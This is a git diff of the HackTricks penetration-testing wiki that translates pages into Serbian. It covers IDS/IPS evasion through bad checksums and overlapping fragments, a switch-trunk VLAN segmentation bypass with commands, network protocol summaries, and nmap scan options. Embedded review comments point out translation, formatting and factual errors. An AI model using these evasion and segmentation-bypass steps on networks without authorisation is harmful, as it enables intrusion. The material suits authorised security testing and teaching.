option:** `-f` +Pošaljite paket sa RST flagom i nevažećim checksum-om, tako da će IPS/IDS možda pomisliti da ovaj paket zatvara vezu, ali konačni host će odbaciti paket jer je checksum nevažeći. 
-# **Invalid** _**checksum**_ +# **Neobični IP i TCP opcije** -Sensors usually don't calculate checksum for performance reasons. So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example: +Senzor može zanemariti pakete sa određenim flagovima i opcijama postavljenim unutar IP i TCP zaglavlja, dok konačni host prihvata paket po prijemu. -Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid. +# **Preklapanje** -# **Uncommon IP and TCP options** +Moguće je da kada fragmentirate paket, postoji neka vrsta preklapanja između paketa (možda prvih 8 bajtova paketa 2 preklapa poslednjih 8 bajtova paketa 1, i poslednjih 8 bajtova paketa 2 preklapa prvih 8 bajtova paketa 3). Tada, ako IDS/IPS ponovo sastavi pakete na drugačiji način od konačnog hosta, biće interpretiran drugačiji paket.\ +Ili možda, 2 paketa sa istim pomakom dolaze i host mora odlučiti koji će uzeti. -A sensor might disregard packets with certain flags and options set within IP and TCP headers, whereas the destination host accepts the packet upon receipt. +- **BSD**: Ima prednost za pakete sa manjim _pomakom_. Za pakete sa istim pomakom, izabira prvi. +- **Linux**: Kao BSD, ali preferira poslednji paket sa istim pomakom. +- **Prvi** (Windows): Prva vrednost koja dođe, vrednost koja ostaje. +- **Poslednji** (cisco): Poslednja vrednost koja dođe, vrednost koja ostaje. -# **Overlapping** - -It is possible that when you fragment a packet, some kind of overlapping exists between packets (maybe first 8 bytes of packet 2 overlaps with last 8 bytes of packet 1, and 8 last bytes of packet 2 overlaps with first 8 bytes of packet 3). 
Then, if the IDS/IPS reassembles them in a different way than the final host, a different packet will be interpreted.\ -Or maybe, 2 packets with the same offset comes and the host has to decide which one it takes. - -- **BSD**: It has preference for packets with smaller _offset_. For packets with same offset, it will choose the first one. -- **Linux**: Like BSD, but it prefers the last packet with the same offset. -- **First** (Windows): First value that comes, value that stays. -- **Last** (cisco): Last value that comes, value that stays. - -# Tools +# Alati - [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke) -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md index eaf5835eb..169eae3d3 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md +++ b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md 
@@ -2,34 +2,27 @@ {{#include ../../banners/hacktricks-training.md}} -If direct access to a switch is available, VLAN segmentation can be bypassed. This involves reconfiguring the connected port to trunk mode, establishing virtual interfaces for target VLANs, and setting IP addresses, either dynamically (DHCP) or statically, depending on the scenario (**for further details check [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).** +Ako je direktan pristup switch-u dostupan, VLAN segmentacija može biti zaobiđena. To uključuje reconfiguraciju povezanog porta u trunk mode, uspostavljanje virtuelnih interfejsa za ciljne VLAN-ove i postavljanje IP adresa, bilo dinamički (DHCP) ili statički, u zavisnosti od scenarija (**za više detalja proverite [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).** -Initially, identification of the specific connected port is required. This can typically be accomplished through CDP messages, or by searching for the port via the **include** mask. - -**If CDP is not operational, port identification can be attempted by searching for the MAC address**: +Prvo je potrebno identifikovati specifičan povezani port. To se obično može postići putem CDP poruka, ili pretraživanjem porta putem **include** maske. +**Ako CDP nije operativan, identifikacija porta može se pokušati pretraživanjem MAC adrese**: ``` SW1(config)# show mac address-table | include 0050.0000.0500 ``` - -Prior to switching to trunk mode, a list of existing VLANs should be compiled, and their identifiers determined. These identifiers are then assigned to the interface, enabling access to various VLANs through the trunk. The port in use, for instance, is associated with VLAN 10. 
- +Pre nego što se pređe u trunk režim, treba sastaviti listu postojećih VLAN-ova i odrediti njihove identifikatore. Ovi identifikatori se zatim dodeljuju interfejsu, omogućavajući pristup raznim VLAN-ovima putem trunk-a. Port koji se koristi, na primer, povezan je sa VLAN 10. ``` SW1# show vlan brief ``` - -**Transitioning to trunk mode entails entering interface configuration mode**: - +**Prelazak na trunk režim podrazumeva ulazak u režim konfiguracije interfejsa**: ``` SW1(config)# interface GigabitEthernet 0/2 SW1(config-if)# switchport trunk encapsulation dot1q SW1(config-if)# switchport mode trunk ``` +Prebacivanje u trunk režim će privremeno prekinuti konektivnost, ali se to može kasnije obnoviti. -Switching to trunk mode will temporarily disrupt connectivity, but this can be restored subsequently. - -Virtual interfaces are then created, assigned VLAN IDs, and activated: - +Zatim se kreiraju virtuelni interfejsi, dodeljuju VLAN ID-ovi i aktiviraju: ```bash sudo vconfig add eth0 10 sudo vconfig add eth0 20 
@@ -40,25 +33,20 @@ sudo ifconfig eth0.20 up sudo ifconfig eth0.50 up sudo ifconfig eth0.60 up ``` - -Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured: - +Nakon toga, zahtev za adresu se šalje putem DHCP-a. Alternativno, u slučajevima kada DHCP nije izvodljiv, adrese se mogu ručno konfigurisati: ```bash sudo dhclient -v eth0.10 sudo dhclient -v eth0.20 sudo dhclient -v eth0.50 sudo dhclient -v eth0.60 ``` - -Example for manually setting a static IP address on an interface (VLAN 10): - +Primer za ručno postavljanje statičke IP adrese na interfejsu (VLAN 10): ```bash sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0 ``` +Konekcija se testira pokretanjem ICMP zahteva ka podrazumevanim prolazima za VLAN-ove 10, 20, 50 i 60. -Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60. - -Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions. +Na kraju, ovaj proces omogućava zaobilaženje VLAN segmentacije, čime se olakšava neograničen pristup bilo kojoj VLAN mreži i postavlja osnova za naredne akcije. ## References diff --git a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index 72dfbfb12..3c73fc892 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md 
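Review bot: "reconfiguraciju" in the first translated paragraph of lateral-vlan-segmentation-bypass.md is a misspelling; the Serbian form is "rekonfiguraciju". The same hunk deletes every blank line that separated prose from the ``` fences (the `- ` lines before each block) and places the `+` prose directly against the fences, which is inconsistent with the rest of the repository; keep one blank line before and after each fence. While the file is being touched, the unchanged `SW1(config)# show mac address-table | include 0050.0000.0500` is shown at the config prompt, where IOS needs `do show mac address-table ...`; the later `SW1# show vlan brief` already uses the privileged EXEC prompt, so the two should agree.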
@@ -2,54 +2,54 @@ ## Multicast DNS (mDNS) -The **mDNS** protocol is designed for IP address resolution within small, local networks without a dedicated name server. It operates by multicasting a query within the subnet, prompting the host with the specified name to respond with its IP address. All devices in the subnet can then update their mDNS caches with this information. +Protokol **mDNS** je dizajniran za rešavanje IP adresa unutar malih, lokalnih mreža bez posvećenog servera imena. Funkcioniše tako što multicast-uje upit unutar podmreže, podstičući host sa specificiranim imenom da odgovori sa svojom IP adresom. Svi uređaji u podmreži mogu zatim ažurirati svoje mDNS kešove sa ovom informacijom. -Key points to note: +Ključne tačke koje treba napomenuti: -- **Domain Name Relinquishment**: A host can release its domain name by sending a packet with a TTL of zero. -- **Usage Restriction**: mDNS typically resolves names ending in **.local** only. Conflicts with non-mDNS hosts in this domain require network configuration adjustments. -- **Networking Details**: - - Ethernet multicast MAC addresses: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`. - - IP addresses: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`. - - Operates over UDP port 5353. - - mDNS queries are confined to the local network and do not cross routers. +- **Odricanje od imena domena**: Host može osloboditi svoje ime domena slanjem paketa sa TTL-om nula. +- **Ograničenje korišćenja**: mDNS obično rešava imena koja se završavaju sa **.local**. Sukobi sa non-mDNS hostovima u ovoj domeni zahtevaju prilagođavanje mrežne konfiguracije. +- **Detalji mreže**: +- Ethernet multicast MAC adrese: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`. +- IP adrese: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`. +- Radi preko UDP porta 5353. +- mDNS upiti su ograničeni na lokalnu mrežu i ne prelaze rutere. 
## DNS-SD (Service Discovery) -DNS-SD is a protocol for discovering services on a network by querying specific domain names (e.g., `_printers._tcp.local`). A response includes all related domains, such as available printers in this case. A comprehensive list of service types can be found [here](http://www.dns-sd.org/ServiceTypes.html). +DNS-SD je protokol za otkrivanje usluga na mreži putem upita specifičnih imena domena (npr., `_printers._tcp.local`). Odgovor uključuje sve povezane domene, kao što su dostupni štampači u ovom slučaju. Sveobuhvatna lista tipova usluga može se naći [ovde](http://www.dns-sd.org/ServiceTypes.html). ## SSDP (Simple Service Discovery Protocol) -SSDP facilitates the discovery of network services and is primarily utilized by UPnP. It's a text-based protocol using UDP over port 1900, with multicast addressing. For IPv4, the designated multicast address is `239.255.255.250`. SSDP's foundation is [HTTPU](https://en.wikipedia.org/wiki/HTTPU), an extension of HTTP for UDP. +SSDP olakšava otkrivanje mrežnih usluga i prvenstveno se koristi od strane UPnP. To je tekstualni protokol koji koristi UDP preko porta 1900, sa multicast adresiranjem. Za IPv4, određena multicast adresa je `239.255.255.250`. Osnova SSDP-a je [HTTPU](https://en.wikipedia.org/wiki/HTTPU), ekstenzija HTTP-a za UDP. ## Web Service for Devices (WSD) -Devices connected to a network can identify available services, like printers, through the Web Service for Devices (WSD). This involves broadcasting UDP packets. Devices seeking services send requests, while service providers announce their offerings. +Uređaji povezani na mrežu mogu identifikovati dostupne usluge, poput štampača, putem Web Service for Devices (WSD). Ovo uključuje emitovanje UDP paketa. Uređaji koji traže usluge šalju zahteve, dok provajderi usluga najavljuju svoje ponude. ## OAuth 2.0 -OAuth 2.0 is a protocol facilitating secure, selective sharing of user information between services. 
For instance, it enables services to access user data from Google without multiple logins. The process involves user authentication, authorization by the user, and token generation by Google, allowing service access to the specified user data. +OAuth 2.0 je protokol koji olakšava sigurno, selektivno deljenje korisničkih informacija između usluga. Na primer, omogućava uslugama pristup korisničkim podacima sa Google-a bez višestrukih prijava. Proces uključuje autentifikaciju korisnika, autorizaciju od strane korisnika i generisanje tokena od strane Google-a, omogućavajući uslugama pristup specificiranim korisničkim podacima. ## RADIUS -RADIUS (Remote Authentication Dial-In User Service) is a network access protocol primarily used by ISPs. It supports authentication, authorization, and accounting. User credentials are verified by a RADIUS server, potentially including network address verification for added security. Post-authentication, users receive network access and their session details are tracked for billing and statistical purposes. +RADIUS (Remote Authentication Dial-In User Service) je protokol za pristup mreži koji se prvenstveno koristi od strane ISP-ova. Podržava autentifikaciju, autorizaciju i obračun. Korisnički podaci se verifikuju od strane RADIUS servera, potencijalno uključujući verifikaciju mrežne adrese za dodatnu sigurnost. Nakon autentifikacije, korisnici dobijaju pristup mreži, a detalji njihove sesije se prate za obračun i statističke svrhe. ## SMB and NetBIOS ### SMB (Server Message Block) -SMB is a protocol for sharing files, printers, and ports. It operates directly over TCP (port 445) or via NetBIOS over TCP (ports 137, 138). This dual compatibility enhances connectivity with various devices. +SMB je protokol za deljenje fajlova, štampača i portova. Radi direktno preko TCP (porta 445) ili putem NetBIOS-a preko TCP (portovi 137, 138). Ova dualna kompatibilnost poboljšava povezanost sa raznim uređajima. 
### NetBIOS (Network Basic Input/Output System) -NetBIOS manages network sessions and connections for resource sharing. It supports unique names for devices and group names for multiple devices, enabling targeted or broadcast messaging. Communication can be connectionless (no acknowledgment) or connection-oriented (session-based). While NetBIOS traditionally operates over protocols like IPC/IPX, it's commonly used over TCP/IP. NetBEUI, an associated protocol, is known for its speed but was also quite verbose due to broadcasting. +NetBIOS upravlja mrežnim sesijama i vezama za deljenje resursa. Podržava jedinstvena imena za uređaje i grupna imena za više uređaja, omogućavajući ciljanje ili emitovanje poruka. Komunikacija može biti bez veze (bez potvrde) ili orijentisana na vezu (na bazi sesije). Dok NetBIOS tradicionalno funkcioniše preko protokola kao što su IPC/IPX, često se koristi preko TCP/IP. NetBEUI, povezan protokol, poznat je po svojoj brzini, ali je takođe bio prilično opširan zbog emitovanja. ## LDAP (Lightweight Directory Access Protocol) -LDAP is a protocol enabling the management and access of directory information over TCP/IP. It supports various operations for querying and modifying directory information. Predominantly, it's utilized for accessing and maintaining distributed directory information services, allowing interaction with databases designed for LDAP communication. +LDAP je protokol koji omogućava upravljanje i pristup informacijama o direktorijumu preko TCP/IP. Podržava razne operacije za upit i modifikaciju informacija o direktorijumu. Pretežno se koristi za pristup i održavanje distribuiranih usluga informacija o direktorijumu, omogućavajući interakciju sa bazama podataka dizajniranim za LDAP komunikaciju. ## Active Directory (AD) -Active Directory is a network-accessible database containing objects like users, groups, privileges, and resources, facilitating centralized management of network entities. 
AD organizes its data into a hierarchical structure of domains, which can encompass servers, groups, and users. Subdomains allow further segmentation, each potentially maintaining its own server and user base. This structure centralizes user management, granting or restricting access to network resources. Queries can be made to retrieve specific information, like contact details, or to locate resources, like printers, within the domain. +Active Directory je mrežno dostupna baza podataka koja sadrži objekte kao što su korisnici, grupe, privilegije i resursi, olakšavajući centralizovano upravljanje mrežnim entitetima. AD organizuje svoje podatke u hijerarhijsku strukturu domena, koja može obuhvatati servere, grupe i korisnike. Poddomeni omogućavaju dalju segmentaciju, pri čemu svaki može održavati svoj vlastiti server i korisničku bazu. Ova struktura centralizuje upravljanje korisnicima, dodeljujući ili ograničavajući pristup mrežnim resursima. Upiti se mogu vršiti za preuzimanje specifičnih informacija, kao što su kontakt detalji, ili za lociranje resursa, kao što su štampači, unutar domena. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md index 02535d28b..a57e293d1 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md +++ b/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md @@ -1,96 +1,90 @@ -# Nmap Summary (ESP) +# Nmap Sažetak (ESP) {{#include ../../banners/hacktricks-training.md}} - -
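Review bot: in the network-protocols-explained-esp.md hunk the three sub-bullets under "Detalji mreže" lose their two-space indent (the English `  - Ethernet multicast MAC addresses`, `  - IP addresses`, `  - Operates over UDP port 5353` come back as top-level `+- ...` items), so the nested list flattens on render; restore the indent. Two pre-existing factual slips are carried into the translation and could be corrected in the same pass: SMB over NetBIOS runs on TCP 139 (137 and 138 are the UDP name-service and datagram ports), so "ports 137, 138" / "portovi 137, 138" is wrong, and "IPC/IPX" in the NetBIOS paragraph should read "IPX/SPX".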
- -{% embed url="https://websec.nl/" %} - ``` nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 ``` +## Parametri -## Parameters +### IP adrese za skeniranje -### IPs to scan - -- **`,`:** Indicate the ips directly +- **`,`:** Indikujte IP adrese direktno - **`-iL `:** list_IPs -- **`-iR `**: Number of random Ips, you can exclude possible Ips with `--exclude ` or `--excludefile `. +- **`-iR `**: Broj nasumičnih IP adresa, možete isključiti moguće IP adrese sa `--exclude ` ili `--excludefile `. -### Equipment discovery +### Otkriće opreme -By default Nmap launches a discovery phase consisting of: `-PA80 -PS443 -PE -PP` +Podrazumevano, Nmap pokreće fazu otkrivanja koja se sastoji od: `-PA80 -PS443 -PE -PP` -- **`-sL`**: It is not invasive, it lists the targets making **DNS** requests to resolve names. It is useful to know if for example www.prueba.es/24 all Ips are our targets. -- **`-Pn`**: **No ping**. This is useful if you know that all of them are active (if not, you could lose a lot of time, but this option also produces false negatives saying that they are not active), it prevents the discovery phase. -- **`-sn`** : **No port scan**. After completing the reconnaissance phase, it does not scan ports. It is relatively stealthy, and allows a small network scan. With privileges it sends an ACK (-PA) to 80, a SYN(-PS) to 443 and an echo request and a Timestamp request, without privileges it always completes connections. If the target is the network, it only uses ARP(-PR). If used with another option, only the packets of the other option are dropped. -- **`-PR`**: **Ping ARP**. It is used by default when analyzing computers in our network, it is faster than using pings. If you do not want to use ARP packets use `--send-ip`. -- **`-PS `**: It sends SYN packets to which if it answers SYN/ACK it is open (to which it answers with RST so as not to end the connection), if it answers RST it is closed and if it does not answer it is unreachable. 
In case of not having privileges, a total connection is automatically used. If no ports are given, it throws it to 80. -- **`-PA `**: Like the previous one but with ACK, combining both of them gives better results. -- **`-PU `**: The objective is the opposite, they are sent to ports that are expected to be closed. Some firewalls only check TCP connections. If it is closed it is answered with port unreachable, if it is answered with another icmp or not answered it is left as destination unreachable. -- **`-PE, -PP, -PM`** : ICMP PINGS: echo replay, timestamp and addresmask. They are launched to find out if the target is active. -- **`-PY`**: Sends SCTP INIT probes to 80 by default, INIT-ACK(open) or ABORT(closed) or nothing or ICMP unreachable(inactive) can be replied. -- **`-PO `**: A protocol is indicated in the headers, by default 1(ICMP), 2(IGMP) and 4(Encap IP). For ICMP, IGMP, TCP (6) and UDP (17) protocols the protocol headers are sent, for the rest only the IP header is sent. The purpose of this is that due to the malformation of the headers, Protocol unreachable or responses of the same protocol are answered to know if it is up. -- **`-n`**: No DNS -- **`-R`**: DNS always +- **`-sL`**: Nije invazivan, navodi ciljeve praveći **DNS** zahteve za razrešavanje imena. Korisno je znati da li su, na primer, www.prueba.es/24 sve IP adrese naši ciljevi. +- **`-Pn`**: **Bez pinga**. Ovo je korisno ako znate da su svi aktivni (ako ne, mogli biste izgubiti mnogo vremena, ali ova opcija takođe proizvodi lažne negativne rezultate govoreći da nisu aktivni), sprečava fazu otkrivanja. +- **`-sn`** : **Bez skeniranja portova**. Nakon završetka faze izviđanja, ne skenira portove. Relativno je neprimetan i omogućava malo skeniranje mreže. Sa privilegijama šalje ACK (-PA) na 80, SYN(-PS) na 443 i echo zahtev i zahtev za vremenskom oznakom, bez privilegija uvek završava veze. Ako je cilj mreža, koristi samo ARP(-PR). 
Ako se koristi sa drugom opcijom, samo se paketi druge opcije odbacuju. +- **`-PR`**: **Ping ARP**. Koristi se podrazumevano prilikom analize računara u našoj mreži, brži je od korišćenja pinga. Ako ne želite da koristite ARP pakete, koristite `--send-ip`. +- **`-PS `**: Šalje SYN pakete na koje, ako odgovori SYN/ACK, port je otvoren (na koji odgovara sa RST kako ne bi završio vezu), ako odgovori RST, port je zatvoren, a ako ne odgovori, port je nedostupan. U slučaju da nemate privilegije, automatski se koristi potpuna veza. Ako nisu dati portovi, šalje se na 80. +- **`-PA `**: Kao prethodni, ali sa ACK, kombinovanjem oboje daje bolje rezultate. +- **`-PU `**: Cilj je suprotan, šalju se na portove za koje se očekuje da su zatvoreni. Neki vatrozidi proveravaju samo TCP veze. Ako je zatvoren, odgovara se sa port nedostupan, ako se odgovara sa drugim icmp ili ne odgovara, ostavlja se kao odredište nedostupno. +- **`-PE, -PP, -PM`** : ICMP PINGS: echo replay, vremenska oznaka i maska adrese. Pokreću se da bi se saznalo da li je cilj aktivan. +- **`-PY`**: Šalje SCTP INIT probe na 80 podrazumevano, INIT-ACK (otvoren) ili ABORT (zatvoren) ili ništa ili ICMP nedostupan (neaktivan) može biti odgovoreno. +- **`-PO `**: Protokol se označava u zaglavljima, podrazumevano 1 (ICMP), 2 (IGMP) i 4 (Encap IP). Za ICMP, IGMP, TCP (6) i UDP (17) protokole šalju se zaglavlja protokola, za ostale se šalje samo IP zaglavlje. Svrha ovoga je da zbog deformacije zaglavlja, odgovori na Protokol nedostupan ili odgovori istog protokola se šalju da bi se znalo da li je aktivan. +- **`-n`**: Bez DNS +- **`-R`**: DNS uvek -### Port scanning techniques +### Tehnike skeniranja portova -- **`-sS`**: Does not complete the connection so it leaves no trace, very good if it can be used.(privileges) It is the one used by default. -- **`-sT`**: Completes the connection, so it does leave a trace, but it can be used for sure. By default without privileges. -- **`-sU`**: Slower, for UDP. 
Mostly: DNS(53), SNMP(161,162), DHCP(67 and 68), (-sU53,161,162,67,68): open(reply), closed(port unreachable), filtered (another ICMP), open/filtered (nothing). In case of open/filtered, -sV sends numerous requests to detect any of the versions that nmap supports and can detect the true state. It increases a lot the time. -- **`-sY`**: SCTP protocol fails to establish the connection, so there are no logs, works like -PY -- **`-sN,-sX,-sF`:** Null, Fin, Xmas, they can penetrate some firewalls and extract information. They are based on the fact that standard compliant machines should respond with RST all requests that do not have SYN, RST or ACK lags raised: open/filtered(nothing), closed(RST), filtered (ICMP unreachable). Unreliable on WIndows, CIsco, BSDI and OS/400. On unix yes. -- **`-sM`**: Maimon scan: Sends FIN and ACK flags, used for BSD, currently will return all as closed. -- **`-sA, sW`**: ACK and Window, is used to detect firewalls, to know if the ports are filtered or not. The -sW does distinguish between open/closed since the open ones respond with a different window value: open (RST with window other than 0), closed (RST window = 0), filtered (ICMP unreachable or nothing). Not all computers work this way, so if it is all closed, it is not working, if it is a few open, it is working fine, and if it is many open and few closed, it is working the other way around. -- **`-sI`:** Idle scan. For the cases in which there is an active firewall but we know that it does not filter to a certain Ip (or when we simply want anonymity) we can use the zombie scanner (it works for all the ports), to look for possible zombies we can use the scrpit ipidseq or the exploit auxiliary/scanner/ip/ipidseq. This scanner is based on the IPID number of the IP packets. -- **`--badsum`:** It sends the sum wrong, the computers would discard the packets, but the firewalls could answer something, it is used to detect firewalls. 
-- **`-sZ`:** "Weird" SCTP scanner, when sending probes with cookie echo fragments they should be dropped if open or responded with ABORT if closed. It can pass through firewalls that init does not pass through, the bad thing is that it does not distinguish between filtered and open. -- **`-sO`:** Protocol Ip scan. Sends bad and empty headers in which sometimes not even the protocol can be distinguished. If ICMP unreachable protocol arrives it is closed, if unreachable port arrives it is open, if another error arrives, filtered, if nothing arrives, open|filtered. -- **`-b `:** FTPhost--> It is used to scan a host from another one, this is done by connecting the ftp of another machine and asking it to send files to the ports that you want to scan from another machine, according to the answers we will know if they are open or not. \[\:\@]\\[:\] Almost all ftps servers no longer let you do this and therefore it is of little practical use. +- **`-sS`**: Ne završava vezu, tako da ne ostavlja trag, veoma dobro ako se može koristiti. (privilegije) To je ono što se koristi podrazumevano. +- **`-sT`**: Završava vezu, tako da ostavlja trag, ali se može sigurno koristiti. Podrazumevano bez privilegija. +- **`-sU`**: Sporije, za UDP. Uglavnom: DNS(53), SNMP(161,162), DHCP(67 i 68), (-sU53,161,162,67,68): otvoren (odgovor), zatvoren (port nedostupan), filtriran (drugi ICMP), otvoren/filtriran (ništa). U slučaju otvorenog/filtriranog, -sV šalje brojne zahteve da otkrije bilo koju od verzija koje nmap podržava i može otkriti stvarno stanje. Povećava vreme skeniranja. +- **`-sY`**: SCTP protokol ne uspeva da uspostavi vezu, tako da nema logova, radi kao -PY +- **`-sN,-sX,-sF`:** Null, Fin, Xmas, mogu proći kroz neke vatrozide i izvući informacije. Zasnovani su na činjenici da standardne mašine treba da odgovore sa RST na sve zahteve koji nemaju SYN, RST ili ACK kašnjenja: otvoren/filtriran (ništa), zatvoren (RST), filtriran (ICMP nedostupan). 
Nepouzdano na Windows, Cisco, BSDI i OS/400. Na unixu da. +- **`-sM`**: Maimon skeniranje: Šalje FIN i ACK zastavice, koristi se za BSD, trenutno će sve vratiti kao zatvoreno. +- **`-sA, sW`**: ACK i Window, koristi se za otkrivanje vatrozida, da bi se znalo da li su portovi filtrirani ili ne. -sW razlikuje između otvorenog/zatvorenog, pošto otvoreni odgovaraju sa različitom vrednošću prozora: otvoren (RST sa prozorom različitim od 0), zatvoren (RST prozor = 0), filtriran (ICMP nedostupan ili ništa). Ne rade sve mašine na ovaj način, tako da ako je sve zatvoreno, ne radi, ako je nekoliko otvorenih, radi dobro, a ako je mnogo otvorenih i malo zatvorenih, radi obrnuto. +- **`-sI`:** Idle skeniranje. U slučajevima kada postoji aktivni vatrozid, ali znamo da ne filtrira za određeni IP (ili kada jednostavno želimo anonimnost) možemo koristiti zombie skener (radi za sve portove), da bismo tražili moguće zombije možemo koristiti skriptu ipidseq ili exploit auxiliary/scanner/ip/ipidseq. Ovaj skener se zasniva na IPID broju IP paketa. +- **`--badsum`:** Šalje pogrešnu sumu, računari bi odbacili pakete, ali vatrozidi bi mogli odgovoriti na nešto, koristi se za otkrivanje vatrozida. +- **`-sZ`:** "Čudan" SCTP skener, kada šalje probe sa fragmentima cookie echo, trebali bi biti odbijeni ako su otvoreni ili odgovoreni sa ABORT ako su zatvoreni. Može proći kroz vatrozide koje init ne može, loša stvar je što ne razlikuje između filtriranih i otvorenih. +- **`-sO`:** Protokol IP skeniranje. Šalje loša i prazna zaglavlja u kojima ponekad ni protokol ne može biti razlikovan. Ako stigne ICMP nedostupan protokol, zatvoren je, ako stigne nedostupan port, otvoren je, ako stigne druga greška, filtriran je, ako ništa ne stigne, otvoren|filtriran. 
+- **`-b `:** FTPhost--> Koristi se za skeniranje hosta sa drugog, ovo se radi povezivanjem na ftp druge mašine i traženjem da pošalje datoteke na portove koje želite da skenirate sa druge mašine, prema odgovorima ćemo znati da li su otvoreni ili ne. \[\:\@]\\[:\] Gotovo svi ftps serveri više ne dozvoljavaju ovo i stoga je malo praktične upotrebe. -### **Focus Analysis** +### **Analiza fokusa** -**-p:** Used to specify ports to scan. To select all 65,335 ports: **-p-** or **-p all**. Nmap has an internal classification based on popularity. By default, it uses the top 1000 ports. With **-F** (fast scan) it analyzes the top 100. With **--top-ports ** it analyzes that number of top ports (from 1 to 65,335). It checks ports in random order; to prevent this, use **-r**. We can also select specific ports: 20-30,80,443,1024- (the latter means to look from 1024 onwards). We can also group ports by protocols: U:53,T:21-25,80,139,S:9. We can also choose a range within Nmap's popular ports: -p [-1024] analyzes up to port 1024 from those included in nmap-services. **--port-ratio ** Analyzes the most common ports within a ratio between 0 and 1 +**-p:** Koristi se za određivanje portova za skeniranje. Da biste odabrali svih 65,335 portova: **-p-** ili **-p all**. Nmap ima internu klasifikaciju zasnovanu na popularnosti. Podrazumevano koristi 1000 najpopularnijih portova. Sa **-F** (brzo skeniranje) analizira 100 najpopularnijih. Sa **--top-ports ** analizira taj broj najpopularnijih portova (od 1 do 65,335). Proverava portove nasumičnim redosledom; da biste to sprečili, koristite **-r**. Takođe možemo odabrati specifične portove: 20-30,80,443,1024- (potonje znači da tražimo od 1024 nadalje). Takođe možemo grupisati portove po protokolima: U:53,T:21-25,80,139,S:9. Takođe možemo odabrati opseg unutar popularnih portova Nmap-a: -p [-1024] analizira do porta 1024 iz onih uključenih u nmap-services. 
**--port-ratio ** Analizira najčešće portove unutar odnosa između 0 i 1 -**-sV** Version scanning, intensity can be regulated from 0 to 9, default is 7. +**-sV** Skeniranje verzija, intenzitet se može regulisati od 0 do 9, podrazumevano je 7. -**--version-intensity ** We regulate the intensity, so that the lower it is, it will only launch the most probable probes, but not all. With this, we can considerably shorten UDP scanning time +**--version-intensity ** Reguliramo intenzitet, tako da što je niži, samo će pokrenuti najverovatnije probe, ali ne sve. Ovime možemo značajno skratiti vreme skeniranja UDP-a -**-O** OS detection +**-O** Otkrivanje operativnog sistema -**--osscan-limit** For proper host scanning, at least one open port and one closed port are needed. If this condition isn't met and we've set this, it won't attempt OS prediction (saves time) +**--osscan-limit** Za pravilno skeniranje hosta, potrebna su najmanje jedan otvoren port i jedan zatvoren port. Ako ova uslov nije ispunjen i postavili smo ovo, neće pokušati predikciju OS-a (štedi vreme) -**--osscan-guess** When OS detection isn't perfect, this makes it try harder +**--osscan-guess** Kada otkrivanje OS-a nije savršeno, ovo ga tera da se više potrudi -**Scripts** +**Skripte** --script __|__|__|__[,...] 
-To use default scripts, use -sC or --script=default +Da biste koristili podrazumevane skripte, koristite -sC ili --script=default -Available types are: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln +Dostupne vrste su: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, i vuln -- **Auth:** executes all available authentication scripts -- **Default:** executes basic default tool scripts -- **Discovery:** retrieves information from the target or victim -- **External:** script for using external resources -- **Intrusive:** uses scripts considered intrusive to the victim or target -- **Malware:** checks for connections opened by malicious code or backdoors -- **Safe:** executes non-intrusive scripts -- **Vuln:** discovers the most known vulnerabilities -- **All:** executes absolutely all available NSE extension scripts +- **Auth:** izvršava sve dostupne skripte za autentifikaciju +- **Default:** izvršava osnovne podrazumevane skripte alata +- **Discovery:** preuzima informacije sa cilja ili žrtve +- **External:** skripta za korišćenje spoljašnjih resursa +- **Intrusive:** koristi skripte koje se smatraju invazivnim za žrtvu ili cilj +- **Malware:** proverava veze otvorene od strane zlonamernog koda ili backdoor-a +- **Safe:** izvršava neinvazivne skripte +- **Vuln:** otkriva najpoznatije ranjivosti +- **All:** izvršava apsolutno sve dostupne NSE ekstenzijske skripte -To search for scripts: +Da biste pretražili skripte: -**nmap --script-help="http-\*" -> Those starting with http-** +**nmap --script-help="http-\*" -> One koje počinju sa http-** -**nmap --script-help="not intrusive" -> All except those** +**nmap --script-help="not intrusive" -> Sve osim onih** -**nmap --script-help="default or safe" -> Those in either or both** +**nmap --script-help="default or safe" -> One u bilo kojoj ili obe** -**nmap --script-help="default and safe" --> Those in 
